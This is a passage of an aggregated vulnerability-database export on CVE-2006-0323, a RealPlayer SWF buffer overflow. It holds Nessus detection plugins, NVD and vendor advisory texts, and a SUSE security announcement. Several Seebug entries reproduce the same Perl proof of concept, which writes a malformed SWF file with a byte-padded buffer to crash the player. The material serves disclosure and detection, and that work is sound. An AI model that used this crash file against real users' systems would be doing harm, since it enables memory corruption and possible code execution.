remind you that the Real player on these\nproducts cannot be updated and recommend to deinstall it.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/advisories/2006_18_realplayer.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the RealPlayer package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"RealPlayer-10.0.7-0.1\", release:\"SUSE10.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"RealPlayer-10.0.7-0.1\", release:\"SUSE9.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"RealPlayer-10.0.7-0.1\", release:\"SUSE9.3\") )\n{\n security_hole(0);\n exit(0);\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-07T14:37:23", "description": "According to its build number, the installed version of RealPlayer / RealOne Player / RealPlayer Enterprise on the remote Windows host suffers from one or more buffer overflows involving maliciously- crafted SWF and MBC files as well as web pages. In addition, it also may be affected by a local privilege escalation issue.", "cvss3": {}, "published": "2006-03-24T00:00:00", "type": "nessus", "title": "RealPlayer for Windows < Build 6.0.12.1483 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-2922", "CVE-2005-2936", "CVE-2006-0323", "CVE-2006-1370"], "modified": "2018-07-25T00:00:00", "cpe": ["cpe:/a:realnetworks:realplayer"], "id": "REALPLAYER_6_0_12_1483.NASL", "href": "https://www.tenable.com/plugins/nessus/21140", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21140);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2005-2922\", \"CVE-2005-2936\", \"CVE-2006-0323\", \"CVE-2006-1370\");\n script_bugtraq_id(15448, 17202);\n\n script_name(english:\"RealPlayer for Windows < Build 6.0.12.1483 Multiple Vulnerabilities\");\n script_summary(english:\"Checks RealPlayer build number\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows application is affected by several issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"According to its build number, the installed version of RealPlayer /\nRealOne Player / RealPlayer Enterprise on the remote Windows host\nsuffers from one or more buffer overflows involving maliciously-\ncrafted SWF and MBC files as well as web pages. In addition, it also\nmay be affected by a local privilege escalation issue.\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d16d359\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c0b66183\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://service.real.com/realplayer/security/03162006_player/en/\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade according to the vendor advisory referenced above.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/03/24\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/15\");\n script_cvs_date(\"Date: 2018/07/25 18:58:06\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2006/03/16\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:realnetworks:realplayer\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"realplayer_detect.nasl\");\n script_require_keys(\"SMB/RealPlayer/Product\", \"SMB/RealPlayer/Build\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\n\n\n# nb: RealOne Player and RealPlayer Enterprise are also affected,\n# but we don't currently know which specific build numbers\n# address the issues.\nprod = get_kb_item(\"SMB/RealPlayer/Product\");\nif (!prod || prod != \"RealPlayer\") exit(0);\n\n\n# Check build.\nbuild = get_kb_item(\"SMB/RealPlayer/Build\");\nif (!build) exit(0);\n\n# There's a problem if the build is before 6.0.12.1483.\nver = split(build, sep:'.', keep:FALSE);\nif (\n int(ver[0]) < 6 ||\n (\n int(ver[0]) == 6 &&\n int(ver[1]) == 0 && \n (\n int(ver[2]) < 12 ||\n (int(ver[2]) == 12 && int(ver[3]) < 1483)\n )\n )\n)\n{\n if (report_verbosity)\n {\n report = string(\n \"\\n\",\n prod, \" build \", build, \" is installed on the remote host.\\n\"\n );\n security_hole(port:get_kb_item(\"SMB/transport\"), extra:report);\n }\n else security_hole(get_kb_item(\"SMB/transport\"));\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-11-22T05:39:19", "description": "Buffer overflow in swfformat.dll in multiple RealNetworks products and versions including RealPlayer 10.x, RealOne Player, Rhapsody 3, and Helix Player allows remote attackers to execute arbitrary code via a crafted SWF (Flash) file with (1) a size value that is less than the actual size, or (2) other unspecified manipulations.", "cvss3": {}, "published": "2006-03-23T23:06:00", "type": "prion", "title": "Buffer overflow", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2018-10-19T15:44:00", "id": "PRION:CVE-2006-0323", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2006-0323", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T16:10:40", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "RealNetworks Multiple Products Multiple Buffer Overflow Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2014-07-01T00:00:00", "id": "SSV:81069", "href": "https://www.seebug.org/vuldb/ssvid-81069", "sourceData": "\n source: http://www.securityfocus.com/bid/17202/info\r\n\r\nVarious RealNetworks products are prone to multiple buffer-overflow vulnerabilities.\r\n\r\nThese issues can result in memory corruption and facilitate arbitrary code execution. A successful attack can allow remote attackers to execute arbitrary code in the context of the application to gain unauthorized access.\r\n\r\n#!/usr/bin/perl\r\n###################################################\r\n# RealPlayer: Buffer overflow vulnerability / PoC\r\n#\r\n# CVE-2006-0323\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n# RealNetworks Advisory\r\n# http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n# Federico L. Bossi Bonin \r\n# fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to Thread -1218976064 (LWP 21932)]\r\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\r\n\r\nmy $EGGFILE="egg.swf";\r\nmy $header="\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60";\r\n\r\nmy $endheader="\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01".\r\n\t "\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02".\r\n\t "\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00".\r\n "\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40".\r\n\t "\\x00\\x00\\x00";\r\n\r\n\r\nopen(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\\n";\r\nprint EGG $header;\r\n\r\nfor ($i = 0; $i < 135; $i++) {\r\n$buffer.= "\\x90";\r\n}\r\n\r\nprint EGG $buffer;\r\nprint EGG $endheader;\r\nclose(EGG);\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-81069", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:44:52", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "type": "seebug", "title": "RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2014-07-01T00:00:00", "id": "SSV:63442", "href": "https://www.seebug.org/vuldb/ssvid-63442", "sourceData": "\n #!/usr/bin/perl\r\n###################################################\r\n# RealPlayer: Buffer overflow vulnerability / PoC\r\n#\r\n# CVE-2006-0323\r\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n# RealNetworks Advisory\r\n# http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n# Federico L. Bossi Bonin \r\n# fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to Thread -1218976064 (LWP 21932)]\r\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\r\n\r\nmy $EGGFILE="egg.swf";\r\nmy $header="\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60";\r\n\r\nmy $endheader="\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01".\r\n\t "\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02".\r\n\t "\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00".\r\n "\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40".\r\n\t "\\x00\\x00\\x00";\r\n\r\n\r\nopen(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\\n";\r\nprint EGG $header;\r\n\r\nfor ($i = 0; $i < 135; $i++) {\r\n$buffer.= "\\x90";\r\n}\r\n\r\nprint EGG $buffer;\r\nprint EGG $endheader;\r\nclose(EGG);\r\n\r\n# milw0rm.com [2006-03-28]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-63442", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T21:52:59", "description": "No description provided by source.", "cvss3": {}, "published": "2007-12-26T00:00:00", "type": "seebug", "title": "RealPlayer 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2007-12-26T00:00:00", "id": "SSV:7738", "href": "https://www.seebug.org/vuldb/ssvid-7738", "sourceData": "\n #!/usr/bin/perl\r\n###################################################\r\n#\u00a0RealPlayer:\u00a0Buffer\u00a0overflow\u00a0vulnerability\u00a0/\u00a0PoC\r\n#\r\n#\u00a0CVE-2006-0323\r\n#\u00a0http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n#\r\n#\u00a0RealNetworks\u00a0Advisory\r\n#\u00a0http://service.real.com/realplayer/security/03162006_player/en/\r\n#\r\n#\u00a0Federico\u00a0L.\u00a0Bossi\u00a0Bonin\u00a0\r\n#\u00a0fbossi[at]netcomm.com.ar\r\n###################################################\r\n\r\n#\u00a0Program\u00a0received\u00a0signal\u00a0SIGSEGV,\u00a0Segmentation\u00a0fault.\r\n#\u00a0[Switching\u00a0to\u00a0Thread\u00a0-1218976064\u00a0(LWP\u00a021932)]\r\n#\u00a00xb502eeaf\u00a0in\u00a0CanUnload2\u00a0()\u00a0from\u00a0./plugins/swfformat.so\r\n\r\nmy\u00a0$EGGFILE=\\\\\\"egg.swf\\\\\\";\r\nmy\u00a0$header=\\\\\\"\\\\\\\\x46\\\\\\\\x57\\\\\\\\x53\\\\\\\\x05\\\\\\\\xCF\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x60\\\\\\";\r\n\r\nmy\u00a0$endheader=\\\\\\"\\\\\\\\x19\\\\\\\\xe4\\\\\\\\x7d\\\\\\\\x1c\\\\\\\\xaf\\\\\\\\xa3\\\\\\\\x92\\\\\\\\x0c\\\\\\\\x72\\\\\\\\xc1\\\\\\\\x80\\\\\\\\x00\\\\\\\\xa2\\\\\\\\x08\\\\\\\\x01\\\\\\".\r\n\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x01\\\\\\\\x02\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x02\\\\\\\\x03\\\\\\\\x00\\\\\\\\x02\\\\\\".\r\n\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x04\\\\\\\\x04\\\\\\\\x00\\\\\\\\x03\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x08\\\\\\\\x05\\\\\\\\x00\\\\\\\\x04\\\\\\\\x00\\\\\\".\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\\\x89\\\\\\\\x06\\\\\\\\x06\\\\\\\\x01\\\\\\\\x00\\\\\\\\x01\\\\\\\\x00\\\\\\\\x16\\\\\\\\xfa\\\\\\\\x1f\\\\\\\\x40\\\\\\\\x40\\\\\\".\r\n\t\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\\\\\\"\\\\\\\\x00\\\\\\\\x00\\\\\\\\x00\\\\\\";\r\n\r\n\r\nopen(EGG,\u00a0\\\\\\">$EGGFILE\\\\\\")\u00a0or\u00a0die\u00a0\\\\\\"ERROR:$EGGFILE\\\\\\\\n\\\\\\";\r\nprint\u00a0EGG\u00a0$header;\r\n\r\nfor\u00a0($i\u00a0=\u00a00;\u00a0$i\u00a0<\u00a0135;\u00a0$i++)\u00a0{\r\n$buffer.=\u00a0\\\\\\"\\\\\\\\x90\\\\\\";\r\n}\r\n\r\nprint\u00a0EGG\u00a0$buffer;\r\nprint\u00a0EGG\u00a0$endheader;\r\nclose(EGG);\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-7738", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T22:32:01", "description": "No description provided by source.", "cvss3": {}, "published": "2006-03-28T00:00:00", "type": "seebug", "title": "RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-28T00:00:00", "id": "SSV:15954", "href": "https://www.seebug.org/vuldb/ssvid-15954", "sourceData": "\n #!/usr/bin/perl\n###################################################\n# RealPlayer: Buffer overflow vulnerability / PoC\n#\n# CVE-2006-0323\n# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\n#\n# RealNetworks Advisory\n# http://service.real.com/realplayer/security/03162006_player/en/\n#\n# Federico L. Bossi Bonin \n# fbossi[at]netcomm.com.ar\n###################################################\n\n# Program received signal SIGSEGV, Segmentation fault.\n# [Switching to Thread -1218976064 (LWP 21932)]\n# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so\n\nmy $EGGFILE="egg.swf";\nmy $header="\\x46\\x57\\x53\\x05\\xCF\\x00\\x00\\x00\\x60";\n\nmy $endheader="\\x19\\xe4\\x7d\\x1c\\xaf\\xa3\\x92\\x0c\\x72\\xc1\\x80\\x00\\xa2\\x08\\x01".\n\t "\\x00\\x00\\x00\\x00\\x01\\x02\\x00\\x01\\x00\\x00\\x00\\x02\\x03\\x00\\x02".\n\t "\\x00\\x00\\x00\\x04\\x04\\x00\\x03\\x00\\x00\\x00\\x08\\x05\\x00\\x04\\x00".\n "\\x00\\x00\\x00\\x89\\x06\\x06\\x01\\x00\\x01\\x00\\x16\\xfa\\x1f\\x40\\x40".\n\t "\\x00\\x00\\x00";\n\n\nopen(EGG, ">$EGGFILE") or die "ERROR:$EGGFILE\\n";\nprint EGG $header;\n\nfor ($i = 0; $i < 135; $i++) {\n$buffer.= "\\x90";\n}\n\nprint EGG $buffer;\nprint EGG $endheader;\nclose(EGG);\n\n# milw0rm.com [2006-03-28]\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15954", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2023-12-06T15:47:22", "description": "\n\nSecunia Advisories Reports:\n\nA boundary error when processing SWF files can be exploited to\n\t cause a buffer overflow. This may allow execution of arbitrary\n\t code on the user's system.\n\n\n", "cvss3": {}, "published": "2006-03-23T00:00:00", "type": "freebsd", "title": "linux-realplayer -- buffer overrun", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2006-03-23T00:00:00", "id": "25858C37-BDAB-11DA-B7D4-00123FFE8333", "href": "https://vuxml.freebsd.org/freebsd/25858c37-bdab-11da-b7d4-00123ffe8333.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:35:07", "description": "RealPlayer and RealOne Player are media player applications developed by RealNetworks, Inc. These applications are capable of playing back numerous multimedia file formats. The application can open media files from local file system or network servers. RealPlayer has an extensible nature that allows it to handle different media file formats by way of external plugin modules. One such module that is included with some players from RealNetworks is the SWF Flash module. It allows the RealPlayer to process certain types of Macromedia Flash (SWF) files. There exists a buffer overflow vulnerability in the RealNetworks RealPlayer product. The vulnerability is specific to parsing malformed Macromedia Flash (SWF) files. An attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged in user. In case of an attack where code injection and execution is successful, the process flow of the vulnerable application will be diverted to attacker supplied code. The result of such an attack is entirely dependent on the purpose of the injected code. In case of an attack where code injection is not successful, the affected application will terminate.", "cvss3": {}, "published": "2010-02-21T00:00:00", "type": "checkpoint_advisories", "title": "RealNetworks RealPlayer SWF Flash File Buffer Overflow (CVE-2006-0323)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-0323"], "modified": "2014-03-18T00:00:00", "id": "CPAI-2006-211", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "description": "Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities\r\n\r\nBy Sowhat of Nevis Labs\r\nDate: 2006.03.22\r\n\r\nhttp://www.nevisnetworks.com\r\nhttp://secway.org/advisory/AD20060322.txt\r\n\r\nCVE: CVE-2006-0323\r\nUS CERT: VU#231028\r\n\r\nVendor\r\nRealNetworks Inc.\r\n\r\nProducts affected:\r\n\r\nWindows\r\nRealPlayer 8\r\nRealOne Player & RealOne Player V2\r\nRealPlayer 10\r\nRealPlayer 10.5\r\n\r\nMacintosh\r\nRealOne Player\r\nRealPlayer 10\r\n\r\nLinux\r\nRealPlayer 10\r\n\r\n\r\nOverview:\r\n\r\nRealPlayer is an application for playing various media formats,\r\ndeveloped by RealNetworks Inc. For more information, visit\r\nhttp://www.real.com/.\r\n\r\nDetails:\r\n\r\nThere are multiple vulnerabilities found in swfformat.dll.\r\nA carefully crafted .swf file may execute arbitrary code or crash the\r\nRealPlayer.\r\n\r\nBy persuading a user to access a specially crafted SWF file with RealPlayer,\r\na remote attacker may be able to execute arbitrary code.\r\nAnd also, these vulnerabilities can be triggered remotely through ActiveX\r\nin IE.\r\n\r\nBy setting the size of SWF files to a value smaller than the actual size,\r\nyou can trigger one of the vulnerabilities.\r\n\r\nActually, there are multiple holes that have been fixed in swfformat.dll.\r\n\r\nPOC:\r\n\r\nNo PoC will be released for this.\r\n\r\n\r\nFIX:\r\n\r\nhttp://service.real.com/realplayer/security/03162006_player/en/\r\n\r\n\r\nVendor Response:\r\n\r\n2005.10.07 Vendor notified via email\r\n2005.10.07 Vendor responded\r\n2005.03.22 Patch released\r\n2006.04.11 Advisory released\r\n\r\n\r\nCommon Vulnerabilities and Exposures (CVE) Information:\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe following names to these issues. These are candidates for\r\ninclusion in the CVE list (http://cve.mitre.org), which standardizes\r\nnames for security problems.\r\n\r\n\r\n CVE-2006-0323\r\n\r\n\r\nGreetings to Paul Gese@real.com, Chi, OYXin, Narasimha Datta and all\r\n Nevis Labs guys.\r\n\r\n\r\nReferences:\r\n\r\n1. http://service.real.com/realplayer/security/03162006_player/en/\r\n2. http://www.kb.cert.org/vuls/id/231028\r\n3. http://www.macromedia.com/licensing/developer/fileformat/faq/\r\n4. http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323\r\n5. http://www.gentoo.org/security/en/glsa/glsa-200603-24.xml\r\n6. http://www.novell.com/linux/security/advisories/2006_18_realplayer.html\r\n7. http://secunia.com/advisories/19358/\r\n\r\n\r\n\r\n\r\n--\r\nSowhat\r\nhttp://secway.org\r\n"Life is like a bug, Do you know how to exploit it ?"\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "cvss3": {}, "published": "2006-04-11T00:00:00", "type": "securityvulns", "title": "[Full-disclosure] Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2006-0323"], "modified": "2006-04-11T00:00:00", "id": "SECURITYVULNS:DOC:12161", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:12161", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:16", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n______________________________________________________________________________\r\n\r\n SUSE Security Announcement\r\n\r\n Package: RealPlayer\r\n Announcement ID: SUSE-SA:2006:018\r\n Date: Thu, 23 Mar 2006 12:00:00 +0000\r\n Affected Products: Novell Linux Desktop 9\r\n SUSE LINUX 10.0\r\n SUSE LINUX 9.3\r\n SUSE LINUX 9.2\r\n Vulnerability Type: remote code execution\r\n Severity (1-10): 8\r\n SUSE Default Package: yes\r\n Cross-References: CVE-2005-2922, CVE-2006-0323\r\n\r\n Content of This Advisory:\r\n 1) Security Vulnerability Resolved:\r\n realplayer security problems\r\n Problem Description\r\n 2) Solution or Work-Around\r\n 3) Special Instructions and Notes\r\n 4) Package Location and Checksums\r\n 5) Pending Vulnerabilities, Solutions, and Work-Arounds:\r\n See SUSE Security Summary Report.\r\n 6) Authenticity Verification and Additional Information\r\n\r\n______________________________________________________________________________\r\n\r\n1) Problem Description and Brief Discussion\r\n\r\n This update fixes the following security problems in Realplayer:\r\n\r\n - Specially crafted SWF files could cause a buffer overflow and\r\n crash RealPlayer (CVE-2006-0323).\r\n\r\n - Specially crafted web sites could cause heap overflow and lead to\r\n executing arbitrary code (CVE-2005-2922). This was already fixed\r\n with the previously released 1.0.6 version, but not announced on\r\n request of Real.\r\n\r\n The advisory for these problems is on this page at Real:\r\n http://service.real.com/realplayer/security/03162006_player/en/\r\n\r\n SUSE Linux 9.2 up to 10.0 and Novell Linux Desktop 9 are affected by\r\n this problem and receive fixed packages.\r\n\r\n If you are still using Realplayer on SUSE Linux 9.1 or SUSE Linux\r\n Desktop 1, we again wish to remind you that the Real player on these\r\n products cannot be updated and recommend to deinstall it.\r\n\r\n2) Solution or Work-Around\r\n\r\n There is no known workaround, please install the update packages.\r\n\r\n3) Special Instructions and Notes\r\n\r\n None.\r\n\r\n4) Package Location and Checksums\r\n\r\n The preferred method for installing security updates is to use the YaST\r\n Online Update (YOU) tool. YOU detects which updates are required and\r\n automatically performs the necessary steps to verify and install them.\r\n Alternatively, download the update packages for your distribution manually\r\n and verify their integrity by the methods listed in Section 6 of this\r\n announcement. Then install the packages using the command\r\n\r\n rpm -Fhv <file.rpm>\r\n\r\n to apply the update, replacing <file.rpm> with the filename of the\r\n downloaded RPM package.\r\n\r\n\r\n x86 Platform:\r\n\r\n SUSE LINUX 10.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm\r\n eaf09598db97183bdb25478dc5266edf\r\n\r\n SUSE LINUX 9.3:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm\r\n 427de6f3af871dca3d9c6c4f42d14793\r\n\r\n SUSE LINUX 9.2:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/RealPlayer-10.0.7-0.1.i586.rpm\r\n e84dd17634bcb046ade69fcdc8d67468\r\n\r\n Sources:\r\n\r\n SUSE LINUX 10.0:\r\n ftp://ftp.suse.com/pub/suse/i386/update/10.0/rpm/src/RealPlayer-10.0.7-0.1.nosrc.rpm\r\n d686f982312d06ff76ad786c29c94f5a\r\n\r\n SUSE LINUX 9.3:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/RealPlayer-10.0.7-0.1.src.rpm\r\n 5355bf3f17801d07f9a004711622dc8e\r\n\r\n SUSE LINUX 9.2:\r\n ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/RealPlayer-10.0.7-0.1.src.rpm\r\n 0a7e783c563c24107b04b7f7f4e0b697\r\n\r\n Our maintenance customers are notified individually. The packages are\r\n offered for installation from the maintenance web:\r\n\r\n http://support.novell.com/cgi-bin/search/searchtid.cgi?psdb/3ad7b20395a03f666b8f4ffe14e9276d.html\r\n\r\n______________________________________________________________________________\r\n\r\n5) Pending Vulnerabilities, Solutions, and Work-Arounds:\r\n\r\n See SUSE Security Summary Report.\r\n______________________________________________________________________________\r\n\r\n6) Authenticity Verification and Additional Information\r\n\r\n - Announcement authenticity verification:\r\n\r\n SUSE security announcements are published via mailing lists and on Web\r\n sites. The authenticity and integrity of a SUSE security announcement is\r\n guaranteed by a cryptographic signature in each announcement. All SUSE\r\n security announcements are published with a valid signature.\r\n\r\n To verify the signature of the announcement, save it as text into a file\r\n and run the command\r\n\r\n gpg --verify <file>\r\n\r\n replacing <file> with the name of the file where you saved the\r\n announcement. The output for a valid signature looks like:\r\n\r\n gpg: Signature made <DATE> using RSA key ID 3D25D3D9\r\n gpg: Good signature from "SuSE Security Team <security@suse.de>"\r\n\r\n where <DATE> is replaced by the date the document was signed.\r\n\r\n If the security team's key is not contained in your key ring, you can\r\n import it from the first installation CD. To import the key, use the\r\n command\r\n\r\n gpg --import gpg-pubkey-3d25d3d9-36e12d04.asc\r\n\r\n - Package authenticity verification:\r\n\r\n SUSE update packages are available on many mirror FTP servers all over the\r\n world. While this service is considered valuable and important to the free\r\n and open source software community, the authenticity and the integrity of\r\n a package needs to be verified to ensure that it has not been tampered\r\n with.\r\n\r\n There are two verification methods that can be used independently from\r\n each other to prove the authenticity of a downloaded 